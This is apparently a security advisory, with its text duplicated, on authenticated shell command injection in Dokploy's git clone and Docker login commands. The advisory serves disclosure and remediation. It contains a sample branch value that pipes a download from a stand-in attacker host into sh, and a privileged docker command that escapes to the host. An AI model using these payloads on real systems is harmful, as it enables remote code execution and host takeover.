Summary
Dokploy constructs shell commands using JavaScript template literals and executes them via child_process.exec() (which runs through /bin/sh -c). User-supplied branch names, repository URLs, and Docker credentials are interpolated directly into these commands without escaping.
This requires an authenticated user with application create/edit privileges. There is no unauthenticated path to trigger the injection. The developers already have shEscape() in registry.ts but didn't apply it to the vulnerable deployment paths.
Impact
An authenticated attacker with application create/edit privileges can achieve remote code execution on the Dokploy server by injecting shell metacharacters into branch/URL fields. The shell executes with container root privileges, and since Dokploy mounts the Docker socket, this can be escalated to full host compromise via docker run -v /:/host --privileged busybox chroot /host.
The webhook deploy endpoint does NOT expose this to unauthenticated attackers -- branch matching logic prevents the injection payload from matching any real git ref. This is an authenticated vulnerability (PR:L) only.
The core issue is not the Docker socket (which Dokploy needs by design) but the missing shell escaping on user-supplied values -- a fix the codebase already has (shEscape() in registry.ts) but didn't apply to the deployment pipeline.
The Vulnerability
Root Cause
File: packages/server/src/utils/process/execAsync.ts (line 10)
const execAsyncBase = util.promisify(exec); // /bin/sh -c
The codebase has both execAsync (shell-based) and execFileAsync (no shell). The deployment pipeline uses the shell-based variant exclusively.
Injection Points
Custom Git - packages/server/src/utils/providers/git.ts:81
command += `if ! git clone --branch ${customGitBranch} --depth 1 --progress ${customGitUrl} ${outputPath}; then`;GitHub - packages/server/src/utils/providers/github.ts:170
command += `git clone --branch ${branch} --depth 1 ${cloneUrl} ${outputPath} --progress;`;GitLab - packages/server/src/utils/providers/gitlab.ts:155
command += `git clone --branch ${gitlabBranch} --depth 1 ${cloneUrl} ${outputPath} --progress;`;Bitbucket - packages/server/src/utils/providers/bitbucket.ts:128
command += `git clone --branch ${bitbucketBranch} --depth 1 ${cloneUrl} ${outputPath} --progress;`;Docker Login - packages/server/src/utils/providers/docker.ts:14-20
command += `if ! echo "${password}" | docker login --username "${username}" --password-stdin "${registryUrl || ""}" 2>&1; then`;GIT_SSH_COMMAND Port - git.ts:76
const gitSshCommand = `ssh -i /tmp/id_rsa${port ? ` -p ${port}` : ""} -o UserKnownHostsFile=${knownHostsPath}`;All of these use ${variable} interpolation with zero escaping.
The Existing shEscape() That Wasn't Used
File: packages/server/src/services/registry.ts:14
function shEscape(s: string | undefined): string {
if (!s) return "''";
return `'${s.replace(/'/g, `'\\''`)}'`;
}This function is already written and used for Docker registry credentials in safeDockerLoginCommand() (line 19), but was never applied to the git deployment paths.
Attack Chain
Step-by-step (Authenticated User)
- User logs into Dokploy (or signs up if self-hosted)
- User creates an application with source type set to any git provider
- User sets the branch field to:
main; curl http://attacker/payload | sh;
- User clicks Deploy in the Dokploy UI
- The deployment pipeline constructs:
git clone --branch "main; curl http://attacker/payload | sh;" ...
- The shell interprets
; as a command separator
- The injected command executes on the Dokploy server with Docker socket access
What Prevents Webhook Trigger
The webhook endpoint at apps/dokploy/pages/api/deploy/[refreshToken].ts has this check (line 137):
if (!branchName || branchName !== application.branch) {
res.status(301).json({ message: "Branch Not Match" });
return;
}The webhook payload's ref field (e.g. refs/heads/main) must match the stored branch EXACTLY. Since the stored branch is main; curl ..., the webhook payload would need to contain that exact string - which no real git provider would send. Same matching logic applies to customGitBranch (line 144), gitlabBranch (line 196), and bitbucketBranch (line 203).
Remediation
- Apply
shEscape() to ALL shell-interpolated variables - the function already exists at registry.ts:14
- Use
execFileAsync() instead of execAsync() where possible - execFile doesn't invoke a shell
- Whitelist branch names - reject names containing
;, $, `, |, &, \n
- Switch to
shell-quote library - already imported in docker-file.ts (line 5) but not used in deployment paths
DavidCarliez Reporter
Summary
Dokploy constructs shell commands using JavaScript template literals and executes them via
child_process.exec()(which runs through/bin/sh -c). User-supplied branch names, repository URLs, and Docker credentials are interpolated directly into these commands without escaping.This requires an authenticated user with application create/edit privileges. There is no unauthenticated path to trigger the injection. The developers already have
shEscape()inregistry.tsbut didn't apply it to the vulnerable deployment paths.Impact
An authenticated attacker with application create/edit privileges can achieve remote code execution on the Dokploy server by injecting shell metacharacters into branch/URL fields. The shell executes with container root privileges, and since Dokploy mounts the Docker socket, this can be escalated to full host compromise via
docker run -v /:/host --privileged busybox chroot /host.The webhook deploy endpoint does NOT expose this to unauthenticated attackers -- branch matching logic prevents the injection payload from matching any real git ref. This is an authenticated vulnerability (PR:L) only.
The core issue is not the Docker socket (which Dokploy needs by design) but the missing shell escaping on user-supplied values -- a fix the codebase already has (
shEscape()inregistry.ts) but didn't apply to the deployment pipeline.The Vulnerability
Root Cause
File:
packages/server/src/utils/process/execAsync.ts(line 10)The codebase has both
execAsync(shell-based) andexecFileAsync(no shell). The deployment pipeline uses the shell-based variant exclusively.Injection Points
Custom Git -
packages/server/src/utils/providers/git.ts:81GitHub -
packages/server/src/utils/providers/github.ts:170GitLab -
packages/server/src/utils/providers/gitlab.ts:155Bitbucket -
packages/server/src/utils/providers/bitbucket.ts:128Docker Login -
packages/server/src/utils/providers/docker.ts:14-20GIT_SSH_COMMAND Port -
git.ts:76All of these use
${variable}interpolation with zero escaping.The Existing
shEscape()That Wasn't UsedFile:
packages/server/src/services/registry.ts:14This function is already written and used for Docker registry credentials in
safeDockerLoginCommand()(line 19), but was never applied to the git deployment paths.Attack Chain
Step-by-step (Authenticated User)
main; curl http://attacker/payload | sh;git clone --branch "main; curl http://attacker/payload | sh;" ...;as a command separatorWhat Prevents Webhook Trigger
The webhook endpoint at
apps/dokploy/pages/api/deploy/[refreshToken].tshas this check (line 137):The webhook payload's
reffield (e.g.refs/heads/main) must match the stored branch EXACTLY. Since the stored branch ismain; curl ..., the webhook payload would need to contain that exact string - which no real git provider would send. Same matching logic applies tocustomGitBranch(line 144),gitlabBranch(line 196), andbitbucketBranch(line 203).Remediation
shEscape()to ALL shell-interpolated variables - the function already exists atregistry.ts:14execFileAsync()instead ofexecAsync()where possible -execFiledoesn't invoke a shell;,$,`,|,&,\nshell-quotelibrary - already imported indocker-file.ts(line 5) but not used in deployment paths